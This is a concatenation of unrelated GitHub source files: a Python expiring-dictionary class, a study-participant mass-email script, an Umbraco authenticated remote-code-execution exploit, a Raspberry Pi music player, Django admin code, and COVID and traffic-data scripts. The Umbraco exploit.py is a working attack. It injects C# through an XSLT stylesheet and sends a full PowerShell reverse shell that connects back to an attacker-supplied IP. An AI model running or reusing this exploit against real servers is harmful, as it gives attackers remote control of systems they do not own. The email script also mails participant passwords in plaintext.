key_value, key_age = self.get(key, with_age=True) # type: Any, Union[None, float]
if key_age:
key_ttl = self.max_age - key_age
if key_ttl > 0:
return key_ttl
return None
def get(self, key, default=None, with_age=False):
""" Return the value for key if key is in the dictionary, else default. """
try:
return self.__getitem__(key, with_age)
except KeyError:
if with_age:
return default, None
else:
return default
def items(self):
""" Return a copy of the dictionary's list of (key, value) pairs. """
r = []
for key in self._safe_keys():
try:
r.append((key, self[key]))
except KeyError:
pass
return r
def items_with_timestamp(self):
""" Return a copy of the dictionary's list of (key, value, timestamp) triples. """
r = []
for key in self._safe_keys():
try:
r.append((key, OrderedDict.__getitem__(self, key)))
except KeyError:
pass
return r
def values(self):
""" Return a copy of the dictionary's list of values.
See the note for dict.items(). """
r = []
for key in self._safe_keys():
try:
r.append(self[key])
except KeyError:
pass
return r
def fromkeys(self):
""" Create a new dictionary with keys from seq and values set to value. """
raise NotImplementedError()
def iteritems(self):
""" Return an iterator over the dictionary's (key, value) pairs. """
raise NotImplementedError()
def itervalues(self):
""" Return an iterator over the dictionary's values. """
raise NotImplementedError()
def viewitems(self):
""" Return a new view of the dictionary's items ((key, value) pairs). """
raise NotImplementedError()
def viewkeys(self):
""" Return a new view of the dictionary's keys. """
raise NotImplementedError()
def viewvalues(self):
""" Return a new view of the dictionary's values. """
raise NotImplementedError()
def __reduce__(self):
reduced = self.__class__, (self.max_len, self.max_age, ('reduce_result', self.items_with_timestamp()))
return reduced
def __assertions(self, max_len, max_age_seconds):
self.__assert_max_len(max_len)
self.__assert_max_age_seconds(max_age_seconds)
@staticmethod
def __assert_max_len(max_len):
assert max_len >= 1
@staticmethod
def __assert_max_age_seconds(max_age_seconds):
assert max_age_seconds >= 0
@staticmethod
def __is_reduced_result(items):
if len(items) == 2 and items[0] == 'reduce_result':
return True
return False
@staticmethod
def __is_instance_of_expiring_dict(items):
if items is not None:
if isinstance(items, ExpiringDict):
return True
return False
@staticmethod
def __is_instance_of_dict(items):
if isinstance(items, dict):
return True
return False
def __copy_expiring_dict(self, max_len, max_age_seconds, items):
# type: (Union[int, None], Union[float, None], Any) -> None
if max_len is not None:
self.__assert_max_len(max_len)
self.max_len = max_len
else:
self.max_len = items.max_len
if max_age_seconds is not None:
self.__assert_max_age_seconds(max_age_seconds)
self.max_age = max_age_seconds
else:
self.max_age = items.max_age
[self.__setitem__(key, value, set_time) for key, (value, set_time) in items.items_with_timestamp()]
def __copy_dict(self, items):
# type: (dict) -> None
[self.__setitem__(key, value) for key, value in items.items()]
def __copy_reduced_result(self, items):
[self.__setitem__(key, value, set_time) for key, (value, set_time) in items[1]]
``` |
{
"source": "jono3030/study-data-admin-interface",
"score": 4
} |
#### File: study-data-admin-interface/e_mails/send_mails_v3.py
```python
from pathlib import Path
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import csv
import pandas as pd
# Define global variables
dir_path = Path.cwd()
password = 'password'
csv_new = str(dir_path) + '/create_participant/current_new.csv'
csv_reminder = str(dir_path) + '/check_completed/incomplete.csv'
bcc_email = 'bccemailaddress'
# Main function
def sendemail(csv_path,type_choice):
"""Takes a csv with contact information as input and sends e-mails based on it"""
# Define dictinary keys and values
contact_1 = ["First name", "Last name"]
contact_2 = ["First name", "Last name"]
contact_3 = ["First name", "Last name"]
contact_4 = ["First name", "Last name"]
contact_5 = ["First name", "Last name"]
contact_6 = ["First name", "Last name"]
contact_7 = ["First name", "Last name"]
contact_8 = ["First name", "Last name"]
participant_list = pd.read_csv(str(dir_path) + '/create_participant/current_new.csv')
dict_list = participant_list.list.unique()
chosen_list = str(dir_path) + '/e_mails/chosen_list.csv'
blacklist = pd.read_csv(str(dir_path) + '/create_participant/BLACKLIST.csv')
blacklist_id_list = list(blacklist.loc[:, "id"])
# Determine reminder type
dropped_list = pd.read_csv(csv_path) # Temp var for csv_path to drop
# Only for sending reminders
if type_choice == "reminder":
all_or_list = input("(1) All or (2) specific list? ")
if all_or_list == "2":
print("Which list?")
for i in dropped_list.list.unique():
print(i)
selected_reminder_list = input("Selection: ")
# Drop rows that are not relevant for selected list
for index, k in dropped_list.iterrows():
if k[4].strip() != selected_reminder_list:
dropped_list.drop(index, inplace=True)
# Drop rows that are on the blacklist
for index, g in dropped_list.iterrows():
if g[5].strip() in blacklist_id_list:
dropped_list.drop(index, inplace=True)
# Write dropped list to csv
final_dropped = dropped_list.to_csv(chosen_list, index=False)
# Import dropped list as csv_path
csv_path = str(dir_path) + '/e_mails/chosen_list.csv'
# Open csv file
with open(csv_path, 'r', newline='') as f:
reader = csv.reader(f, delimiter=',')
# Skip header
header = next(reader)
# loop to read csv file line by line and assign variables to row items
for row in reader:
last_name = row[0].strip()
first_name = row[1].strip()
affiliation = row[2].strip()
email = row[3].strip()
usr = row[5].strip()
pwd = row[6].strip()
transferent = ""
# Determine transferent
if row[4].strip() == "contact_1":
transferent = contact_1
elif row[4].strip() == "contact_2":
transferent = contact_2
elif row[4].strip() == "contact_3":
transferent = contact_3
elif row[4].strip() == "contact_4":
transferent = contact_4
elif row[4].strip() == "contact_5":
transferent = contact_5
elif row[4].strip() == "contact_6":
transferent = contact_6
elif row[4].strip() == "contact_7":
transferent = contact_7
elif row[4].strip() == "contact_8":
transferent = contact_8
else:
transferent = ["first name", "last name"]
# Use MIMEMultipart library to define required e-mail fields
msg = MIMEMultipart()
msg['To'] = email
bcc_recipients = bcc_email
msg['From'] = "emailaddressofsender"
msg['Subject'] = 'Study'
body_trans_initial = f""" <p>Dear {first_name},</p>
<p>I received your e-mail from {transferent[0]} {transferent[1]}. My name is {nameofsender} and I am working with Dr. {nameofsecondsender}, [...] </p>
<p>I am contacting you because {transferent[0]} believes that [...]</p>
<p>If you are willing to participate, please log in at <a href=\"website\">website</a> with the following unique participant name and password:</p>
<p><b>Usr:</b> {usr}</p>
<p><b>Pwd:</b> {pwd}</p>
<p>On the website you will find all relevant information regarding the study. You will be asked to answer a set of [...]</p>
<p>Please feel free to contact Dr. {nameofsecondsender} or me with any questions, technical issues or concerns.</p>
<p>Thank you for your support – we greatly appreciate it!</p>
<p>Best wishes,</p>
<p>{nameofsender} and Dr. {nameofsecondsender}</p> """
body_trans = f""" <p>Dear {first_name},</p>
<p>First of all, thank you very much for participating in the study - we greatly appreciate it. My name is {nameofsender} and I am working with Dr. {nameofsecondsender} on [...].</p>
<p>To complete the questionnaires, please log in at <a href=\"website\">website</a> with the following unique participantname and password:</p>
<p><b>Usr:</b> {usr}</p>
<p><b>Pwd:</b> {pwd}</p>
<p>On the website you will find all relevant information regarding the study. You will be asked to answer a set of [...]</p>
<p>Please feel free to contact Dr. {nameofsecondsender} or me with any questions, technical issues or concerns.</p>
<p>Every participant counts so, again, thank you for your support!</p>
<p>Best wishes,</p>
<p>{nameofsender} and Dr. {nameofsecondsender}</p> """
body_other = f""" <p>Dear {first_name},</p>
<p>My name is {nameofsender} and I am working with Dr. {nameofsecondsender} on [...]</p>
<p>Thank you very much for participating in our study. Your support is crucial for [...]</p>
<p><b>Usr:</b> {usr}</p>
<p><b>Pwd:</b> {pwd}</p>
<p>On the website you will find all relevant information regarding the study. You will be asked to answer a set of [...]</p>
<p>Please feel free to contact Dr. {nameofsecondsender} or me with any questions, technical issues or concerns.</p>
<p>Thank you again for your support – we greatly appreciate it!</p>
<p>Best wishes,</p>
<p>{nameofsender} and Dr. {nameofsecondsender}</p> """
body_reminder = f""" <p>Dear {first_name},</p>
<p>A while ago you very kindly agreed to help us with [...]</p>
<p>The information we will get from the questionnaires is crucial for the successful development of [...] we would greatly appreciate it if you could complete the questionnaire as soon as you can.</p>
<p>The website can be found at <a href=\"website\">website</a> and you can log in with the following unique participantname and password:</p>
<p><b>Usr:</b> {usr}</p>
<p><b>Pwd:</b> {pwd}</p>
<p>Thank you again for your support – we greatly appreciate it!</p>
<p>Best wishes,</p>
<p>Dr. {nameofsecondsender} and {nameofsender}</p> """
# Determine text
if type_choice == "initial":
if row[4].strip() == "other":
body = body_other
else:
body = body_trans
elif type_choice == "reminder":
body = body_reminder
msg.attach(MIMEText(body, 'html'))
# Actually sending the e-mails with smtplib
server = smtplib.SMTP('smtpserver', 111)
# server.set_debuglevel(1)
server.starttls()
server.login(msg['From'], password)
try:
validity_check = server.verify(email)
finally:
print(f"Sending e-mail to {first_name} {last_name} at {email}")
server.sendmail(msg['From'], [email] + [bcc_recipients], msg.as_string())
server.quit()
print(validity_check)
# Run function
sendemail(csv_new,"initial")
``` |
{
"source": "Jonoans/Umbraco-RCE",
"score": 2
} |
#### File: Jonoans/Umbraco-RCE/exploit.py
```python
from bs4 import BeautifulSoup
from threading import Thread
import argparse
import pwn
import re
import requests
def main():
login = args.user
password = <PASSWORD>
host = args.host
try:
initial = pwn.listen(4444)
final = pwn.listen(4445)
except Exception as e:
raise e
with open('exploit.cs', 'r') as csharp:
code = csharp.read().strip()
payload = f"""
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
{code}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet>
"""
payload = payload.strip() % (args.ip, 4444)
stable_revshell = '$client = New-Object System.Net.Sockets.TCPClient("%s", 4445)' % args.ip
stable_revshell += ';$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)
# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)
soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
"__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
"ctl00$body$xsltSelection": payload,
"ctl00$body$contentPicker$ContentIdValue": "",
"ctl00$body$visualizeDo": "Visualize+XSLT" }
# Launch the attack
Thread(target=s.post, args=(url_xslt,), kwargs={'data': data, 'headers': headers}).start()
initial.wait_for_connection()
initial.sendline(stable_revshell.encode('ascii'))
final.wait_for_connection()
# Quick hack to display prompt lol
final.sendline(b'whoami')
final.recvline()
final.interactive(prompt='')
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='exploit.py',
description='Umbraco authenticated RCE',
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
required=True, dest='user', help='Username / Email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
required=True, dest='password', help='Login password')
parser.add_argument('-w', '--website-url', metavar='URL', type=str, required=True,
dest='host', help='Root URL')
parser.add_argument('-i', '--ip', metavar='IP', type=str, required=True,
dest='ip', help='IP address of callback listener')
args = parser.parse_args()
main()
``` |
{
"source": "jonobarel/rpi_musicbox",
"score": 3
} |
#### File: jonobarel/rpi_musicbox/playback.py
```python
import subprocess
class SongPlayer:
def __init__(self, files_list: [], path = "music/"):
self.current = 0
self.files_list = files_list
self.procs = []
self.current_proc = None
if files_list == None:
raise ValueError('missing parameter: files_list cannot be None')
if not isinstance(files_list, list):
raise TypeError('files_list parameter is not a list')
if len(files_list) < 1:
raise ValueError('files_list is empty')
for f in files_list:
if not isinstance(f, str):
raise TypeError('files_list must only contain strings')
#plays either the song at index i, or the next song on the list.
#If a song is already playing, it will first stop the playback and begin the next one.
def play(self):
#start a new track
if (self.current_proc == None or current_proc.poll() != None):
self.current_proc = subprocess.Popen(["omxplayer", "--adev", "both", "--vol", "-2000", path+self.files_list[self.current]],start_new_session=True, stdin=subprocess.PIPE)
self.current=(self.current+1)%len(files_list)
#if a process exists, check if it is still running.
#If so, send a pause signal.
elif self.current_proc.poll() == None:
current_proc.communicate('p')
else: #process is not running
raise Exception('Could not pause or play track')
def next(self):
#Pause the currently playing song
#def pause(self):
#def stop(self):
``` |
{
"source": "JonoCameron/ChRIS_ultron_backEnd",
"score": 2
} |
#### File: chris_backend/core/admin.py
```python
from django.contrib import admin
from django.contrib.auth.models import Group
from rest_framework.authtoken.models import Token
from .models import ChrisInstance
class ChrisInstanceAdmin(admin.ModelAdmin):
readonly_fields = ['creation_date', 'uuid']
list_display = ('name', 'uuid', 'job_id_prefix', 'creation_date')
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
admin.site.site_header = 'ChRIS Administration'
admin.site.site_title = 'ChRIS Admin'
admin.site.unregister(Group)
admin.site.unregister(Token)
admin.site.register(ChrisInstance, ChrisInstanceAdmin)
```
#### File: chris_backend/core/views.py
```python
from rest_framework import generics, permissions
from .models import ChrisInstance
from .serializers import ChrisInstanceSerializer
class ChrisInstanceDetail(generics.RetrieveAPIView):
"""
A compute resource view.
"""
serializer_class = ChrisInstanceSerializer
queryset = ChrisInstance.objects.all()
permission_classes = (permissions.IsAuthenticated,)
def get_object(self):
"""
Overriden to return the ChrisInstance singleton.
"""
return ChrisInstance.load()
``` |
{
"source": "jonock/corona-bl",
"score": 3
} |
#### File: corona-bl/app/datakicker.py
```python
import pandas as pd
import webbrowser
import requests
import json
import numpy as np
from datetime import date
import time
import csv
from credentials import dwToken
# DataWrapper API Connection
def dataWrapperConnect():
print(dwToken + ' ist der Token. Erfolgreich geladen')
headers = {
'Authorization': f'Bearer {dwToken}',
}
response = requests.get('https://api.datawrapper.de/account', headers=headers)
print(response.text)
return response
def createDWChart(title="Test"):
headers = {
'Authorization': f'Bearer {dwToken}',
}
data = {
"title": title,
"type": "d3-lines"
}
response = requests.post('https://api.datawrapper.de/v3/charts', headers=headers, data=data)
resp = response.json()
print('New Chart created with id :' + resp['id'])
id = resp['id']
return id
def addDWData(id, dataimp):
headers = {
'authorization': f'Bearer {dwToken}',
'content-type': 'text/csv'
}
print(id)
print(dataimp)
data = dataimp.to_csv(f'data/dwcharts/{id}_data.csv', index=True, encoding='utf-8')
print(repr(data))
url = f'https://api.datawrapper.de/charts/{id}/data'
# respo = requests.put(url, headers=headers, data=data)
# webbrowser.open(f'https://datawrapper.de/chart/{id}/upload')
headers = {
'authorization': f'Bearer {dwToken}'
}
# print((requests.get(url=f'https://api.datawrapper.de/v3/charts/{id}/data', headers=headers).json()))
metadata = {
'title': 'newTitleSet',
'type': 'd3-bars',
}
# response = requests.put(url = f'https://api.datawrapper.de/charts/{id}', headers=headers, data=json.dumps(metadata))
# print(response.json())
def updatedwchart(id, data, timeframe='0'):
data = data.to_csv(encoding='utf8', index=False)
url = f'https://api.datawrapper.de/v3/charts/{id}/data'
headers = {
'authorization': f'Bearer {dwToken}',
'content-type': 'text/csv; charset=utf8'
}
dataupdate = (requests.put(url=url, headers=headers, data=data.encode('utf-8')))
# Beschreibung Updaten
url = f'https://api.datawrapper.de/v3/charts/{id}'
headers = {
'authorization': f'Bearer {dwToken}'
}
if timeframe != '0':
message = 'Neuste Daten: ' + timeframe
else:
message = ''
payload = {
'metadata': {
'annotate': {
'notes': f'{message}'
}
}
}
# payload = json.dumps(payload)
description = ((requests.patch(url=url, headers=headers, json=payload)))
url = f'https://api.datawrapper.de/charts/{id}/publish'
payload = ({'json': True})
publish = (requests.post(url=url, headers=headers, json=payload))
print(publish.json())
def getChartMetadata(id):
headers = {
'authorization': f'Bearer {dwToken}'
}
metadataJson = requests.get(url=f'https://api.datawrapper.de/v3/charts/{id}', headers=headers)
metadataDict = metadataJson.json()
print('Metadaten erhalten')
return metadataDict, metadataJson
def metaDatatemp():
metadata, metadataJson = getChartMetadata('f8YHe')
pd.DataFrame.from_dict(metadata['metadata']['visualize']).to_csv('meta.csv')
```
#### File: corona-bl/app/main.py
```python
from selenium import webdriver
import time
from datetime import date
import os
import pandas as pd
import datakicker as dk
def getData():
chrome_options = webdriver.ChromeOptions()
downloadPath= "/Users/jonock/PycharmProjects/corona-bl/app/data"
prefs = {}
prefs["download.default_directory"]=downloadPath
prefs["profile.default_content_settings.popups"] = 0
chrome_options.add_argument('--headless')
chrome_options.binary_location = '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
chrome_options.add_experimental_option("prefs", prefs)
chromedriverpath = "/Users/jonock/PycharmProjects/corona-bl/venv/chromedriver"
driver = webdriver.Chrome(options=chrome_options, executable_path=chromedriverpath)
driver.get('https://cocontrol.bl.ch/public/dbw/209')
#driver.get('https://cocontrol.bl.ch/public/dbw/216')
driver.set_page_load_timeout(10)
#time.sleep(1)
datum = driver.find_element_by_css_selector('.highcharts-subtitle').text
python_button = driver.find_elements_by_css_selector(".highcharts-button-symbol")
python_button[0].click()
python_b = driver.find_elements_by_css_selector(".highcharts-menu-item:nth-child(5)")
python_b[0].click()
time.sleep(2)
driver.close()
return datum
def modifyData(datum):
os.rename('data/14-tage-inzidenz-pro-gemeinde.csv', modifyFilename(datum[62:].replace(')','')+ '_14d.csv'))
print('Datei umbenannt')
data = pd.read_csv(modifyFilename(datum[62:].replace(')','')+ '_14d.csv'))
base = pd.read_csv('data/bl_base.csv')
data = data.sort_values(by=['map_feature'], ignore_index=True)
aggregated = pd.concat([base,data['value']], axis=1)
filename = modifyFilename(datum[62:].replace(')','')+ '_14d_upload.csv')
aggregated.to_csv(filename, index=False)
dk.updatedwchart(id='59AH4', data=aggregated, timeframe=datum[62:].replace(')', ''))
bigtowns = pd.read_csv('data/bl_above2k.csv', index_col=0)
aggregatedbig = pd.concat([bigtowns,data['value']], axis=1, join='inner')
dk.updatedwchart(id='guadQ', data=aggregatedbig, timeframe=datum[62:].replace(')', ''))
return aggregated
def genDate():
today = date.today()
return today.strftime("%Y%m%d")
def modifyFilename(filename):
filename = './data/' + genDate() + '_' + filename
return filename
if __name__ == '__main__':
print('Starte Skript')
datum = getData()
data = modifyData(datum)
print('finito')
``` |
{
"source": "jonock/trafficbs",
"score": 3
} |
#### File: trafficbs/trafficbs/buildlinkmap.py
```python
import pandas as pd
from trafficbs import datakicker
def addMarkers(data, filename, dwid='ZOd9a'):
print(data)
admin = pd.read_csv(filename)
markers = []
for site in admin.iterrows():
print(site)
arrow = {'enabled': True}
id = site[1]['SiteCode']
bikex = {'id': 'bicycle',
'path': 'M625 700l-25-50 100-37 0-113-350 0 0 50 50 0 0 25c0 12-13 25-25 25l-125 0c-25 0-25-25-25-25l0-25 75 0 0-50-53-106c-15 3-31 6-47 6-110 0-200-89-200-200s90-200 200-200 200 90 200 200c0 0 50 0 75 0s25 25 25 25c5 74 43 131 92 169 34 26 71 42 108 50l0-52c-86-22-150-99-150-192 0-110 90-200 200-200s200 90 200 200c0 91-62 167-145 191l-55 109 0 125c0 15-12 31-25 36z m-275-250l225 0c-50-25-125-150-125-200l-58 0c-12 49-41 90-83 117z m-150-125c69 0 125-56 125-125s-56-125-125-125-125 56-125 125 56 125 125 125z m550 0c69 0 125-56 125-125s-56-125-125-125-125 56-125 125 56 125 125 125z',
'horiz-adv-x': 950, 'height': 700, 'width': 950}
bike = {'id': 'bicycle',
'path': 'M625 700l-25-50 100-37 0-113-350 0 0 50 50 0 0 25c0 12-13 25-25 25l-125 0c-25 0-25-25-25-25l0-25 75 0 0-50-53-106c-15 3-31 6-47 6-110 0-200-89-200-200s90-200 200-200 200 90 200 200c0 0 50 0 75 0s25 25 25 25c5 74 43 131 92 169 34 26 71 42 108 50l0-52c-86-22-150-99-150-192 0-110 90-200 200-200s200 90 200 200c0 91-62 167-145 191l-55 109 0 125c0 15-12 31-25 36z m-275-250l225 0c-50-25-125-150-125-200l-58 0c-12 49-41 90-83 117z m-150-125c69 0 125-56 125-125s-56-125-125-125-125 56-125 125 56 125 125 125z m550 0c69 0 125-56 125-125s-56-125-125-125-125 56-125 125 56 125 125 125z',
'horiz-adv-x': 950, }
footx = {'id': 'school',
'path': 'M638 800c-49 0-88-39-88-87s39-88 88-88 87 39 87 88-39 87-87 87z m-400-100c-49 0-88-39-88-87s39-88 88-88 87 39 87 88-39 87-87 87z m462-100c-19 0-49-7-75-25l-162-116c-45-31-4-86 37-59l106 70s70-150 44-220c-1-2-2-4-2-6l-109-291c-12-33 12-53 36-53 16 0 31 10 39 28l136 322s25-150 125-150c60 0 104 0 138 0 37 0 37 38 37 38s0 37-37 37c-25 0-88 0-113 0-53 0-50 80-50 125 0 75-50 200-50 200l150-100c45-30 85 23 41 56l-166 119c-30 22-40 25-75 25 0 0-25 0-50 0z m-525-100c-25 0-37-12-50-25l-106-106c-14-14-19-26-19-44 0-25 38-37 59-16l91 91c50 0 69-125 50-175l-75-200c-21-55 57-72 75-25l75 200s25-50 75-50l150 0c50 0 50 75 0 75l-125 0c-25 0-25 50-25 75 0 100-50 200-100 200z',
'horiz-adv-x': 1050, 'height': 700, 'width': 1050}
foot = {'id': 'school',
'path': 'M638 800c-49 0-88-39-88-87s39-88 88-88 87 39 87 88-39 87-87 87z m-400-100c-49 0-88-39-88-87s39-88 88-88 87 39 87 88-39 87-87 87z m462-100c-19 0-49-7-75-25l-162-116c-45-31-4-86 37-59l106 70s70-150 44-220c-1-2-2-4-2-6l-109-291c-12-33 12-53 36-53 16 0 31 10 39 28l136 322s25-150 125-150c60 0 104 0 138 0 37 0 37 38 37 38s0 37-37 37c-25 0-88 0-113 0-53 0-50 80-50 125 0 75-50 200-50 200l150-100c45-30 85 23 41 56l-166 119c-30 22-40 25-75 25 0 0-25 0-50 0z m-525-100c-25 0-37-12-50-25l-106-106c-14-14-19-26-19-44 0-25 38-37 59-16l91 91c50 0 69-125 50-175l-75-200c-21-55 57-72 75-25l75 200s25-50 75-50l150 0c50 0 50 75 0 75l-125 0c-25 0-25 50-25 75 0 100-50 200-100 200z',
'horiz-adv-x': 1050}
car = {'id': 'taxi-2',
'path': 'M268 243q0 37-26 63t-63 26-63-26-27-63 27-63 63-26 63 26 26 63z m20 178h567l-50 200q-1 4-8 9t-11 6h-429q-5 0-12-6t-7-9z m766-178q0 37-27 63t-63 26-63-26-26-63 26-63 63-26 63 26 27 63z m89 53v-214q0-8-5-13t-13-5h-54v-71q0-45-31-76t-76-31-76 31-31 76v71h-571v-71q0-45-31-76t-76-31-76 31-32 76v71h-53q-8 0-13 5t-5 13v214q0 52 37 89t88 36h16l58 234q13 53 58 88t100 36h429q54 0 100-36t58-88l58-234h16q52 0 88-36t37-89z',
'horiz-adv-x': 1142.9, 'height': 665, 'width': 1143}
if site[1]['title'][7:11] == 'Velo':
icon = bike
elif site[1]['title'][7:11] == 'Fuss':
icon = foot
else:
icon = car
title = site[1]['stationstring']
link = site[1]['url']
if site[1]['ignore'] != 1:
coord = site[1]['coordinates'].split(',')
coordinates = [coord[1], coord[0]]
thismarker = {'id': id, 'type': 'point', 'title': '', 'icon': icon, 'coordinates': coordinates,
'tooltip': {'enabled': True, 'text': '<a href=' + link + '>' + title + '</a>'}}
markers.append(thismarker)
print(thismarker)
data['markers'] = markers
datakicker.updateMarkers(dwid, data)
print('Neue Linkmap gebaut')
# addMarkers(data, '../chartadmin/rollingavg_3m_chartadmin.csv')
# addMarkers(data2, '../chartadmin/MIV_rollingavg_3m_chartadmin.csv', dwid='BBxPZ')
# print('Linkmap gebaut')
```
#### File: trafficbs/trafficbs/datapreps.py
```python
import numpy as np
import pandas as pd
import requests
from tqdm import tqdm
def loaddata(histdata=False, histfilename='../data/200510_download_hist.csv', filename='../data/200515_download.csv',
savename='../data/dailytotals.csv'):
if histdata:
datahist = pd.read_csv(f'{histfilename}', sep=';')
datahist = datahist.loc[(datahist['Year'] > 2016) & (datahist['Year'] < 2019)]
data = pd.read_csv(f'{filename}', sep=';')
groups = data.groupby(['SiteCode', 'Date']).agg(
{
'Total': sum,
'SiteName': 'first',
'ValuesApproved': 'last',
'TrafficType': 'first',
'Year': 'first',
'Month': 'first',
'Day': 'first',
'Weekday': 'first',
'Geo Point': 'first'
}
)
print(savename + ' abgelegt')
if histdata:
groupshist = datahist.groupby(['SiteCode', 'Date']).agg(
{
'Total': sum,
'SiteName': 'first',
'ValuesApproved': 'last',
'TrafficType': 'first',
'Year': 'first',
'Month': 'first',
'Day': 'first',
'Weekday': 'first'
}
)
groupshist['Geo Point'] = np.nan
groupreturn = pd.concat([groupshist, groups])
else:
groupreturn = groups
groupreturn = groupreturn.drop_duplicates()
groupreturn = groupreturn.sort_values(by=['Year', 'Month', 'Day'])
if histdata:
del (groupshist)
del (datahist)
del (data)
del (groups)
groupreturn.to_csv(f'{savename}')
print('fertig')
return (groupreturn)
def monthlyaverages(data):
monthlyavg = data.groupby(['SiteCode', 'Year','Month']).agg(
{
'Total': 'mean',
'SiteName': 'first',
'ValuesApproved': 'last',
'TrafficType': 'first',
'Year': 'first',
'Month': 'first',
'Day': 'first',
'Weekday': 'first',
'Geo Point': 'first'
}
)
print('monthly done')
monthlyavg.to_csv('data/monthlyavg.csv')
return (monthlyavg)
def csvpoll(bsid, filename):
url = f'https://data.bs.ch/explore/dataset/{bsid}/download/?format=csv&timezone=Europe/Berlin&lang=de&use_labels_for_header=true&csv_separator=%3B'
print('Start Download des Datensatzes ' + str(bsid))
r = requests.get(url, allow_redirects=True, stream=True)
# Progress Bar mit tqdm
total_size_in_bytes = int(r.headers.get('content-length', 0))
block_size = 1024 # 1 Kibibyte
progress_bar = tqdm(total=total_size_in_bytes, unit='iB', unit_scale=True)
with open(filename, 'wb') as file:
for data in r.iter_content(block_size):
progress_bar.update(len(data))
file.write(data)
progress_bar.close()
if total_size_in_bytes != 0 and progress_bar.n != total_size_in_bytes:
print("ERROR, something went wrong")
print('Download fertig, File schreiben')
# open(filename, 'wb').write(r.content)
print('Datei ' + filename + ' gespeichert')
# monthlyaverages(daytotals)
```
#### File: trafficbs/trafficbs/processing.py
```python
import os.path
import sys
from datetime import date
import numpy as np
import pandas as pd
from trafficbs import datakicker as dk
def normalavgWD(data):
for site in data['SiteCode'].unique():
thisdata = data.loc[data['SiteCode'] == site].copy()
thisdata['Month'] = thisdata['Month'].astype(int)
thisdata['Day'] = thisdata['Day'].astype(int)
thisdata['Month'] = thisdata['Month'].apply(lambda x: '{0:0>2}'.format(x))
thisdata['Day'] = thisdata['Day'].astype(int).apply(lambda x: '{0:0>2}'.format(x))
thisdata = thisdata.sort_values(by=['Year', 'Month', 'Day']).reset_index(drop=True)
thisdata = thisdata.loc[thisdata['Weekday'] < 5]
thisdata['rollingavg'] = thisdata['Total']
thisdata['date'] = thisdata['Year'].astype(str) + '-' + thisdata['Month'].astype(str) + '-' + thisdata[
'Day'].astype(str)
thisdata['shortdate'] = thisdata['Month'].astype(str) + '-' + thisdata['Day'].astype(str)
newdata = pd.DataFrame(columns=['counter', 'date', 'Month', 'Day', '2018', '2019', '2020'])
da2018 = pd.DataFrame(columns=['Month', 'Day', '2018'])
da2019 = pd.DataFrame(columns=['Month', 'Day', '2019'])
da2020 = pd.DataFrame(columns=['Month', 'Day', '2020'])
da2018['Month'] = thisdata.loc[thisdata['Year'] == 2018]['Month']
da2018['Day'] = thisdata.loc[thisdata['Year'] == 2018]['Day']
da2018['2018'] = thisdata.loc[thisdata['Year'] == 2018]['rollingavg']
da2018['counter'] = range(len(da2018))
da2019['Month'] = thisdata.loc[thisdata['Year'] == 2019]['Month']
da2019['Day'] = thisdata.loc[thisdata['Year'] == 2019]['Day']
da2019['2019'] = thisdata.loc[thisdata['Year'] == 2019]['rollingavg']
da2019['counter'] = range(len(da2019))
da2020['Month'] = thisdata.loc[thisdata['Year'] == 2020]['Month']
da2020['Day'] = thisdata.loc[thisdata['Year'] == 2020]['Day']
da2020['2020'] = thisdata.loc[thisdata['Year'] == 2020]['rollingavg']
da2020['date'] = thisdata.loc[thisdata['Year'] == 2020]['shortdate']
da2020['counter'] = range(len(da2020))
newdata = pd.merge(da2018[['counter', '2018']], da2019[['2019', 'counter']], how='outer',
on=['counter']).reset_index(drop=True)
newdata = pd.merge(newdata, da2020[['2020', 'counter', 'date']], how='outer', on=['counter']).reset_index(
drop=True)
# newdata = newdata.sort_values(by=['Month', 'Day'])
# da2020['date'] = da2020[['Month', 'Day']].agg('-'.join, axis=1)
# newdata = newdata.drop(columns = ['Month', 'Day'])
filestring = 'rollingavgWD_' + thisdata['TrafficType'].iloc[0] + '_' + thisdata['SiteName'].iloc[0].replace(' ',
'').replace(
'/', '')
if thisdata['TrafficType'].iloc[0] == 'Velo':
namestring = 'Anzahl ' + thisdata['TrafficType'].iloc[0] + 's bei ' + thisdata['SiteName'].iloc[0][4:]
else:
namestring = 'Anzahl ' + thisdata['TrafficType'].iloc[0] + ' bei ' + thisdata['SiteName'].iloc[0][4:]
folder = 32224
filename = '../metaconfigs/normalcorona.json'
chartadminfn = '../chartadmin/normalavg_chartadmin.csv'
updatedate = str(max(thisdata['date']))
uploadaverages(site, thisdata, newdata, filestring, namestring, folder, chartadminfn, updatedate, filename)
coronatime = newdata.loc[(newdata['counter'] > 40) & (newdata['counter'] < sum(~np.isnan(newdata['2020'])))]
folder = 32225
